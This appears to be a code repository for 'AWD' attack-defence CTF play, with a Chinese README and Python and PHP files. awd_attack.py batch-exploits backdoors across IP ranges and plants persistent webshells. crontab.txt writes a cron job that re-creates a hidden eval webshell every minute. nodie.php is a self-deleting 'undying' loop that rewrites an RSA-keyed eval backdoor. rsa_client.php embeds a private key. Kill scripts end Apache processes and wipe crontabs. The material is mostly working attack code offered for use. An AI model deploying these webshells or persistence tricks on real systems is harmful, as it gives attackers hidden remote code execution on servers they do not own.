├── README.md
├── awd_attack.py
├── crontab.py
├── crontab.txt
├── kill.php
├── kill_crontab.php
├── nodie.php
├── rsa_attack.py
├── rsa_client.php
└── rsa_server.php


/README.md:
--------------------------------------------------------------------------------
 1 | # awd_attack_framework
 2 | awd攻防常用脚本+不死马+crontab+防御方法
 3 | ## 文件描述：
 4 | awd_attack.py  
 5 | ------awd批量攻击主框架  
 6 | 利用主办方欲留后门进行攻击  
 7 | rsa_client.php  
 8 | ------rsa加密后门客户端  
 9 | 加密攻击的payload并发送给种植在其他队伍服务器上的rsa_server.php  
10 | rsa_server.php  
11 | ------rsa加密后门服务端  
12 | 解密攻击payload并返回执行结果  
13 | rsa_attack.py  
14 | ------rsa木马测试  
15 | 测试rsa客户端和服务端是否可以实现互相通信  
16 | nodie.php  
17 | ------不死马  
18 | 主要负责写入rsa不死马  
19 | crontab.py  
20 | ------定时任务写入脚本  
21 | crontab.txt  
22 | ------定时任务要写入的内容  
23 | kill_crontab.php  
24 | ------清除crontab  
25 | kill.php  
26 | ------清除不死马
27 | 
28 | 


--------------------------------------------------------------------------------
/awd_attack.py:
--------------------------------------------------------------------------------
  1 | #coding:utf-8
  2 | import requests
  3 | import base64
  4 | def drop_database():
  5 |     pass
  6 | def back_door(ip_start,ip_end,shell_addr,shell_pass,payload,method):#后门利用
  7 |     #?c=echo%20file_get_contents("http://172.16.0.255/flag")
  8 |     url = ".".join(ip_start.split(".")[0:3])
  9 |     ip_start = int(ip_start.split(".")[-1])
 10 |     ip_end = int(ip_end.split(".")[-1])
 11 |     shell = shell_addr  #后门地址
 12 |     passwd = shell_pass      #后门密码
 13 |     payload = {passwd:payload}
 14 |     #payload = {passwd: 'curl http://172.16.0.255/flag'}
 15 |     #payload1 = {passwd:"echo file_get_contents(\"http://172.16.0.225:8000/flag\");"}
 16 |     file = open("flag.txt","w")
 17 |     for i in range(ip_start,ip_end): #存活ip列表
 18 |         #if i == 177:
 19 |         #    continue
 20 |         url1 = "http://"+url + "."+str(i)  + shell
 21 |         try:
 22 |             if(method=="get"):
 23 |                 res = requests.get(url1,params=payload,timeout=1)
 24 |             if(method=="post"):
 25 |                 res = requests.post(url1,data=payload,timeout=1)
 26 |             #print(res.text)
 27 |             if  "flag" in res.text:
 28 |                 #print url1 + " connect shell sucess,flag is " + res.text
 29 |                 ip = url +"."+ str(i)
 30 |                 flag = res.text
 31 |                 #flag = re.findall("/(flag{.*})/",flag)
 32 |                 print(ip+"----"+flag)
 33 |                 file.write(ip+"----"+flag)
 34 |                 file.write("\n")
 35 |             else:
 36 |                 print(ip+"----"+"shell 404")
 37 |                 pass
 38 |         except:
 39 |             print(url1 + " connect shell fail 404  ")
 40 |             pass
 41 | #back_door("192.168.111.130","192.168.111.135","/back.php","c","echo file_get_contents(\"../../../../../flag\");","post")
 42 | def make_sudo(ip_start,ip_end,shell_addr,shell_pass,method):#通过后门种植不死马，把维持了权限的ip写进txt
 43 |     ips=open("keep_continue_ip_list.txt","w")
 44 |     filename="c1sec1.php"
 45 |     f= open(filename,'r')
 46 |     php = f.read()
 47 |     print(php)
 48 |     php = base64.b64encode(php.encode("ascii"))
 49 |     php = php.decode("ascii")
 50 |     url = ".".join(ip_start.split(".")[0:3])
 51 |     ip_start = int(ip_start.split(".")[-1])
 52 |     ip_end = int(ip_end.split(".")[-1])
 53 |     shell = shell_addr  
 54 |     passwd = shell_pass            
 55 |     if(method == "get"):
 56 |         data = {passwd:"file_put_contents(\".c1sec2018.php\",base64_decode(\"" + php + "\"));"}
 57 |     if(method == "post"):
 58 |         data = {passwd:"file_put_contents(\".c1sec2018.php\",base64_decode(\"" + php + "\"));"}
 59 |     for i in range(ip_start,ip_end):  # 存活ip列表
 60 |         try:
 61 |             url1 = "http://"+url + "."+str(i) + shell
 62 |             print(url1)
 63 |             if(method == "get"):
 64 |                 attack = requests.get(url=url1,params=data,timeout=1)
 65 |             if(method == "post"):
 66 |                 attack = requests.post(url=url1,data=data,timeout=1)
 67 |             if(attack.status_code == 200):
 68 |                 url1 = "http://"+url + "."+ str(i) +"/.c1sec2018.php" 
 69 |                 try:
 70 |                     requests.get(url=url1,timeout=0.1)
 71 |                 except:
 72 |                     pass 
 73 |                 url1 = "http://"+url + "."+ str(i) +"/.c1sec2333.php"
 74 |                 active = requests.post(url=url1,data={"0":"system","1":"whoami"},timeout=1)
 75 |                 if(len(active.text)>0):
 76 |                     print(active.text)
 77 |                     ips.write(url+"."+str(i)+"----"+"success")
 78 |                     ips.write("\n")
 79 |                     print("please visit "+ url+str(i)+"/.c1sec2333.php"+" to get longer control.")
 80 |                 else:
 81 |                     print("sorry the file is not exit!")
 82 |         except:
 83 |             print(url1+"-----error")
 84 | #make_sudo("192.168.111.130","192.168.111.135","/back.php","c","post")
 85 | 
 86 | 
 87 | def make_crontab(ip_start,ip_end,shell_addr,shell_pass,method):
 88 |     url = ".".join(ip_start.split(".")[0:3])
 89 |     ip_start = int(ip_start.split(".")[-1])
 90 |     ip_end = int(ip_end.split(".")[-1])
 91 |     shell = shell_addr  
 92 |     passwd = shell_pass
 93 |     filename = "cr.txt"
 94 |     f= open(filename,"r")
 95 |     php = f.read() 
 96 |     if(method == "get"):
 97 |         data = {passwd:php}
 98 |     if(method == "post"):
 99 |         data = {passwd:php}
100 |     #print(data)
101 |     for i in range(ip_start,ip_end):
102 |         try:
103 |             url1 = "http://"+url + "."+str(i) + shell
104 |             #print(url1)
105 |             if(method == "get"):
106 |                 attack = requests.get(url=url1,params=data,timeout=1)
107 |             if(method == "post"):
108 |                 attack = requests.post(url=url1,data=data,timeout=1)
109 |             #res = requests.post(url="http://"+url + "."+"133" + shell,data=data)
110 |             #print(attack.text)
111 |             if(len(attack.text)>1):
112 |                 print(url1+"-----------------make crontab success!")
113 |         except:
114 |             print(url1+"-----error")
115 | make_crontab("127.0.0.1","127.0.0.2","/back.php","c","post")
116 | 
117 | 


--------------------------------------------------------------------------------
/crontab.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | def make_crontab():
 3 |     shell ="/back.php"  
 4 |     passwd = "c"
 5 |     filename = "exp.txt"
 6 |     f= open(filename,"r")
 7 |     php = f.read() 
 8 |     data = {passwd:php}
 9 |     url1 = "http://127.0.0.1" + shell
10 |     print(url1)
11 |     print(data)
12 |     try:
13 |         attack = requests.post(url=url1,data=data,timeout=1)
14 |         if(len(attack.content)>1):
15 |             print(attack.content)
16 |             print(url1+"-----------------make crontab success!")
17 |     except:
18 |     	print(url1+"-----error")
19 | make_crontab()
20 | 


--------------------------------------------------------------------------------
/crontab.txt:
--------------------------------------------------------------------------------
1 | system('echo "* * * * * echo \"<?php  if(md5(\\\\\\\\\$_POST[pass])==\'7bae7e68e0663f06e9740289b8eaaaa3\'){@eval(\\\\\\\\\$_POST[1]);}  \" > /var/www/html/.c1sec666.php\n* * * * * chmod 777 /var/www/html/.c1sec666.php" | crontab;whoami');
2 | 


--------------------------------------------------------------------------------
/kill.php:
--------------------------------------------------------------------------------
1 | <?php
2 | system("kill `ps -aux | grep www-data | grep apache2 | awk '{print $2}'`");
3 | ?>
4 | 


--------------------------------------------------------------------------------
/kill_crontab.php:
--------------------------------------------------------------------------------
1 | <?php
2 | system("crontab -r");
3 | 


--------------------------------------------------------------------------------
/nodie.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     set_time_limit(0);
 3 |     ignore_user_abort(1);
 4 |     unlink(__FILE__);
 5 |     $shell='<?php
 6 | class Rsa {private static $PUBLIC_KEY= "-----BEGIN PUBLIC KEY-----
 7 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrFxyAYGqDE9OR3CNPEjGpQDAc
 8 | Icsc9ZG/2HPgzHsME8n45x1yP75Ki0MIYj4uhoygoYlnZPk3gKj60GdM8oD7hvL6
 9 | R24LZij0zixRz+mBU/xac+dJHIK/5xAMtnQeyWcu+QMSLArDln9Wxp7nmONA1Ry5
10 | 4iX4iJ1PVODtw/BZbQIDAQAB
11 | -----END PUBLIC KEY-----
12 | ";
13 |     private static function getPublicKey()
14 |     {
15 |         $publicKey = self::$PUBLIC_KEY;
16 |         return openssl_pkey_get_public($publicKey);
17 |     }
18 | 
19 |     public static function publicDecrypt($encrypted = "")
20 |     {
21 |         if (!is_string($encrypted)) {
22 |             return null;
23 |         }
24 |         return (openssl_public_decrypt(base64_decode($encrypted), $decrypted, self::getPublicKey())) ? $decrypted : null;
25 |     }
26 | }
27 | $cmd=$_POST[cmd];
28 | $rsa = new Rsa();
29 | $publicDecrypt = $rsa->publicDecrypt($cmd);
30 | $res=eval($publicDecrypt);'
31 |     ;
32 |     while(1){
33 |     file_put_contents('.rsa_server.php',$shell);
34 |     system('chmod 777 .rsa_server.php');
35 |     }
36 | ?>
37 | 


--------------------------------------------------------------------------------
/rsa_attack.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import base64
3 | url = "http://127.0.0.1/rsa_client.php"
4 | payload = base64.b64encode("system(\"whoami\")")
5 | res = requests.post(url=url,data={"cmd":payload})
6 | print(res.content)
7 | 
8 | 


--------------------------------------------------------------------------------
/rsa_client.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class Rsa {
 3 | private static $PRIVATE_KEY = '-----BEGIN RSA PRIVATE KEY-----
 4 | MIICXAIBAAKBgQCrFxyAYGqDE9OR3CNPEjGpQDAcIcsc9ZG/2HPgzHsME8n45x1y
 5 | P75Ki0MIYj4uhoygoYlnZPk3gKj60GdM8oD7hvL6R24LZij0zixRz+mBU/xac+dJ
 6 | HIK/5xAMtnQeyWcu+QMSLArDln9Wxp7nmONA1Ry54iX4iJ1PVODtw/BZbQIDAQAB
 7 | AoGADC0A4kH6Uom+rMq12JK65gijY90jz1PKo5SL6puixiFCZmxMNC1FJZjzlE0p
 8 | j7YTm/rjBHCzK7gETpU2RMudUitgsXnwWD9BY2xfcJzukdDYCrgJCuqgGuZ+4D9J
 9 | sAWcWmGDpXXVnvROvJF6Yz4230DN754Af+B6vOsRsK+FhSECQQDZwv7iPnPcG9Pr
10 | Ac8T+KMBex0XbEk4Lh4cRuQN224zkdVEkAsldWcWNBQuUeGXgseywz2xcO0GH238
11 | zjc364gXAkEAySIabW3TR6f8kHTiqKo9pBO0y15LqAHGwQckXkfuibzCxM36pj/p
12 | WVcRZy2WcFrnXjj3zXZecopRb9x/Jx9ZGwJBAJ/t+kwnGehZ97XtSiycuvrndGIz
13 | gULle+/AkNUshy8Qt9T3BXipVOCVtwydzlT8E7ZSdgjPqwSIKLs2qI9FSFkCQEW3
14 | 8Ysu/4aeHzj/mzW11SoTvp6j7/urqfZtAFlB+9h4uta3Q4PvMXbLbHfkYHpPuFV7
15 | z8HDnxd7BKGOv/CSuDMCQEAEJukly0GbEX8VZxFJ5/Ki3m2toGTD1CePObwW1DaS
16 | dmNxKgsScUdcVw0WUVRL4KV4C2XLib6M9hjwqer0OQM=
17 | -----END RSA PRIVATE KEY-----';
18 | 
19 | private static function getPrivateKey()
20 | {
21 | $privKey = self::$PRIVATE_KEY;
22 | return openssl_pkey_get_private($privKey);
23 | }
24 | 
25 | public static function privEncrypt($data = '')
26 | {
27 | if (!is_string($data)) {
28 | return null;
29 | }
30 | return openssl_private_encrypt($data,$encrypted,self::getPrivateKey()) ? base64_encode($encrypted) : null;
31 | }
32 | }
33 | 
34 | $rsa = new Rsa();
35 | $cmd = $_POST['cmd'];
36 | $action = "enc";
37 | if($action!==Null){
38 |     if($action==="enc"){
39 |         $privEncrypt = $rsa->privEncrypt($cmd);
40 |         echo $privEncrypt;
41 |     }
42 | }
43 | 
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/rsa_server.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class Rsa {
 3 |     private static $PUBLIC_KEY= '-----BEGIN PUBLIC KEY-----
 4 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrFxyAYGqDE9OR3CNPEjGpQDAc
 5 | Icsc9ZG/2HPgzHsME8n45x1yP75Ki0MIYj4uhoygoYlnZPk3gKj60GdM8oD7hvL6
 6 | R24LZij0zixRz+mBU/xac+dJHIK/5xAMtnQeyWcu+QMSLArDln9Wxp7nmONA1Ry5
 7 | 4iX4iJ1PVODtw/BZbQIDAQAB
 8 | -----END PUBLIC KEY-----
 9 | ';
10 |     private static function getPublicKey()
11 |     {
12 |         $publicKey = self::$PUBLIC_KEY;
13 |         return openssl_pkey_get_public($publicKey);
14 |     }
15 | 
16 |     public static function publicDecrypt($encrypted = '')
17 |     {
18 |         if (!is_string($encrypted)) {
19 |             return null;
20 |         }
21 |         return (openssl_public_decrypt(base64_decode($encrypted), $decrypted, self::getPublicKey())) ? $decrypted : null;
22 |     }
23 | }
24 | $cmd=$_POST[cmd];
25 | $rsa = new Rsa();
26 | $publicDecrypt = $rsa->publicDecrypt($cmd);
27 | $res=eval($publicDecrypt);
28 | 
29 | 


--------------------------------------------------------------------------------